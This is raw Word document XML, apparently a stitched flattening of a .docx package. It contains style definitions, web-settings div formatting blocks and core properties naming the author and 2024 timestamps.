      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0034694F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="0034694F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003469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694F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:lang w:val="de-AT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003469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44567">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="362631084">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="402988256">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="453908750">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="883906819">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1304964987">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1004361259">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1245531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4887773">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="306010252">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="183399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28407038">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1078333207">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1112168445">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1638022931">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="249049087">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2011134181">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="271206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0369435">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1569681176">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="512767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8216049">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="754596717">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1885405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26119408">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1051884048">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1644575326">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="9413014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6558843">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1535771211">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="37777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64130566">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="795441369">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="234239751">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2128308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9318717">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
            <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="479149832">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="E3E3E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1589390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119691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4297</Words>
  <Characters>24496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Burtscher Niklas</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Burtscher Niklas</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-04T06:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-04T06:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>